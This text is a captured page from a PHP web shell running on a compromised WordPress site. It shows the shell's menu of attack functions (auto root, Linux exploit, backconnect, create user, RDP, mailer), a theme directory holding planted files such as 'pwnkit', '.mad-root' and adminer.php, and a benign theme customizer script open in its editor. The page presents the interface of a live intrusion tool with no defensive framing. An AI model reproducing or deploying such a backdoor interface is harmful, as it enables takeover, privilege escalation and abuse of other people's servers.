Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
signify /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
customize-controls.js
318
B
-rw-r--r--
customize-controls.min.js
154
B
-rw-r--r--
customize-preview.js
1.35
KB
-rw-r--r--
customize-preview.min.js
744
B
-rw-r--r--
functions.js
16.01
KB
-rw-r--r--
functions.min.js
9.5
KB
-rw-r--r--
html5.js
10.09
KB
-rw-r--r--
html5.min.js
2.5
KB
-rw-r--r--
jquery.matchHeight.js
11.5
KB
-rw-r--r--
jquery.matchHeight.min.js
3.19
KB
-rw-r--r--
keyboard-image-navigation.js
518
B
-rw-r--r--
keyboard-image-navigation.min....
250
B
-rw-r--r--
owl.carousel.js
87.94
KB
-rw-r--r--
owl.carousel.min.js
43.09
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
skip-link-focus-fix.js
1.03
KB
-rw-r--r--
skip-link-focus-fix.min.js
501
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : customize-preview.js
/** * File customizer.js. * * Theme Customizer enhancements for a better user experience. * * Contains handlers to make Theme Customizer preview reload changes asynchronously. */ ( function( $ ) { // Site title and description. wp.customize( 'blogname', function( value ) { value.bind( function( to ) { $( '.site-title a' ).text( to ); } ); } ); wp.customize( 'blogdescription', function( value ) { value.bind( function( to ) { $( '.site-description' ).text( to ); } ); } ); // Header text color without header media background. wp.customize( 'header_textcolor', function( value ) { value.bind( function( to ) { if ( 'blank' === to ) { $( '.site-title a, .site-description' ).css( { 'clip': 'rect(1px, 1px, 1px, 1px)', 'position': 'absolute' } ); } else { $( '.site-title a, .site-description' ).css( { 'clip': 'auto', 'position': 'relative', 'color' : to } ); } } ); } ); var style = $( '#signify-color-scheme-css' ), api = wp.customize; if ( ! style.length ) { style = $( 'head' ).append( '<style type="text/css" id="signify-color-scheme-css" />' ) .find( '#signify-color-scheme-css' ); } // Color Scheme CSS. api.bind( 'preview-ready', function() { api.preview.bind( 'update-color-scheme-css', function( css ) { style.html( css ); } ); } ); } )( jQuery );
Close